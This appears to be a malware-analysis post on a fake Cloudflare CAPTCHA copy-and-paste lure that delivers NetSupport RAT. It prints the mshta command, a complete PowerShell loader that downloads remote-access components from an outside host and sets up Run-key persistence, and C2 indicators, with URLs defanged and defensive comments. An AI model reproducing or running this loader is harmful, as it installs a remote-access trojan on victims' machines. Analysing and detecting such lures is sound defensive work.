Fake Cloudflare CAPTCHA copy-and-paste lure delivering NetSupport RAT
A hacked website redirects visitors to
eiesoft[.]com
https://urlscan.io/result/87495eb7-071f-499e-aeb5-a3b08b9f7e48/
"C:\windows\system32\mshta.exe" http://eiesoft[.]com/Ray-verify.html # ✅ ''Verify you are human - Ray Verification ID: xxx''1.0
The mshta command above executes PowerShell that downloads NetSupport RAT:
# Captured second-stage PowerShell, kept as found for analysis (URLs stay defanged).
# Flow: flush the DNS cache, create a hidden random folder under %APPDATA%, fetch twelve
# files served under .png names, save them under NetSupport client file names, add an
# HKCU Run value for persistence, then launch client32.exe.
ipconfig /flushdns
# Staging folder: six random letters (char codes 65..90 and 97..122) under %APPDATA%.
$randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | % {[char]$_})
$randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderName
New-Item -ItemType Directory -Path $randomFolderPath
$Pach = $randomFolderPath
# Per-user Run key (no admin rights needed); the folder is then marked hidden with attrib +h.
$Run = 'HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run'; cmd /c attrib +h $Pach
# Download sources: every component is served with a .png name, so the URL extension
# does not match the file type written to disk.
$url = "http://hardcorelegends[.]com/a/1.png"
$url2 = "http://hardcorelegends[.]com/a/2.png"
$url3 = "http://hardcorelegends[.]com/a/3.png"
$url4 = "http://hardcorelegends[.]com/a/4.png"
$url5 = "http://hardcorelegends[.]com/a/5.png"
$url6 = "http://hardcorelegends[.]com/a/6.png"
$url7 = "http://hardcorelegends[.]com/a/7.png"
$url8 = "http://hardcorelegends[.]com/a/8.png"
$url9 = "http://hardcorelegends[.]com/a/9.png"
$url10 = "http://hardcorelegends[.]com/a/10.png"
$url11 = "http://hardcorelegends[.]com/a/11.png"
$url12 = "http://hardcorelegends[.]com/a/12.png"
# On-disk names inside the staging folder; this file set is the host-side artifact list.
# NOTE(review): client32.ini is presumably the client configuration holding the gateway
# settings — worth extracting during triage; confirm against the recovered file.
$file = $Pach + "\client32.ini"
$file2 = $Pach + "\HTCTL32.DLL"
$file3 = $Pach + "\msvcr100.dll"
$file4 = $Pach + "\nskbfltr.inf"
$file5 = $Pach + "\NSM.ini"
$file6 = $Pach + "\NSM.LIC"
$file7 = $Pach + "\pcicapi.dll"
$file8 = $Pach + "\PCICHEK.DLL"
$file9 = $Pach + "\PCICL32.DLL"
$file10 = $Pach + "\remcmdstub.exe"
$file11 = $Pach + "\TCCTL32.DLL"
$file12 = $Pach + "\client32.exe"
# Twelve sequential plain-HTTP downloads, one per component, each written to its target name.
Invoke-WebRequest $url -OutFile $file
Invoke-WebRequest $url2 -OutFile $file2
Invoke-WebRequest $url3 -OutFile $file3
Invoke-WebRequest $url4 -OutFile $file4
Invoke-WebRequest $url5 -OutFile $file5
Invoke-WebRequest $url6 -OutFile $file6
Invoke-WebRequest $url7 -OutFile $file7
Invoke-WebRequest $url8 -OutFile $file8
Invoke-WebRequest $url9 -OutFile $file9
Invoke-WebRequest $url10 -OutFile $file10
Invoke-WebRequest $url11 -OutFile $file11
Invoke-WebRequest $url12 -OutFile $file12
start-sleep -s 4
# Persistence: Run value named 'Microsoft' whose data is the client32.exe path in the
# staging folder. Detection: hunt for an HKCU Run value with that name pointing under %APPDATA%.
New-ItemProperty -Path $Run -Name 'Microsoft' -Value $file12
start-sleep -s 4
# Launches the client right away; the Run value covers later logons.
Start-Process $file12
NetSupport RAT gateway addresses:
92.255.85[.]135
guidemytax[.]com